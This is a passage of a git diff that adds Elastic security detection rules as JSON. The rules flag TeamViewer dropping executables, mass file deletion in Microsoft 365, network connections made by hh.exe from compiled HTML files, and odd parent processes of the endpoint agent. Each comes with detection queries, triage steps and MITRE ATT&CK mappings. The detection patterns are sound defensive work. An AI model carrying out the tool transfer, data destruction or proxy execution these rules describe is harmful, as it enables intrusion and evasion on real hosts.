derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\") and\n not \n (\n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\*.js\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\?\\\\TeamViewer\\\\update.exe\"\n ) and process.code_signature.trusted == true\n )\n", + "references": [ + "http://web.archive.org/web/20230329160957/https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + }, + { + "id": "T1219", + "name": "Remote Access Software", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_111.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_111.json new file mode 100644 index 00000000000..00241666b6f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_111.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an executable or script file remotely downloaded via a TeamViewer transfer session.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Copy via TeamViewer", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\") and\n not \n (\n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\*.js\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\?\\\\TeamViewer\\\\update.exe\"\n ) and process.code_signature.trusted == true\n )\n", + "references": [ + "http://web.archive.org/web/20230329160957/https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + }, + { + "id": "T1219", + "name": "Remote Access Software", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_103.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_103.json new file mode 100644 index 00000000000..49188602516 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_103.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security.", + "false_positives": [ + "Users or System Administrator cleaning out folders." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Unusual Volume of File Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Unusual volume of file deletion\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b2951150-658f-4a60-832f-a00d1e6c6745", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "b2951150-658f-4a60-832f-a00d1e6c6745_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_105.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_105.json new file mode 100644 index 00000000000..a0ee4d60f05 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security.", + "false_positives": [ + "Users or System Administrator cleaning out folders." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Unusual Volume of File Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Unusual volume of file deletion\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b2951150-658f-4a60-832f-a00d1e6c6745", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "b2951150-658f-4a60-832f-a00d1e6c6745_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_206.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_206.json new file mode 100644 index 00000000000..1e4a87d050c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_206.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security.", + "false_positives": [ + "Users or System Administrator cleaning out folders." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Unusual Volume of File Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Unusual volume of file deletion\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b2951150-658f-4a60-832f-a00d1e6c6745", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "b2951150-658f-4a60-832f-a00d1e6c6745_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_107.json b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_107.json new file mode 100644 index 00000000000..4404ec755ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_107.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. Adversaries may conceal malicious code in a CHM file and deliver it to a victim for execution. CHM content is loaded by the HTML Help executable program (hh.exe).", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Compiled HTML File", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"hh.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"hh.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and\n not dns.question.name : \"localhost\"]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b29ee2be-bf99-446c-ab1a-2dc0183394b8", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.001", + "name": "Compiled HTML File", + "reference": "https://attack.mitre.org/techniques/T1218/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "b29ee2be-bf99-446c-ab1a-2dc0183394b8_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_110.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_110.json new file mode 100644 index 00000000000..8de0a6bcab5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_110.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Endpoint Security Parent Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"esensor.exe\", \"elastic-endpoint.exe\") and\n process.parent.executable != null and\n /* add FPs here */\n not process.parent.executable : (\n \"?:\\\\Program Files\\\\Elastic\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Windows\\\\explorer.exe\"\n ) and\n not (\n process.parent.executable : (\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\System32\\\\SecurityHealthHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n ) and\n process.args : (\n \"test\", \"version\",\n \"top\", \"run\",\n \"*help\", \"status\",\n \"upgrade\", \"/launch\",\n \"/enable\"\n )\n )\n \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": 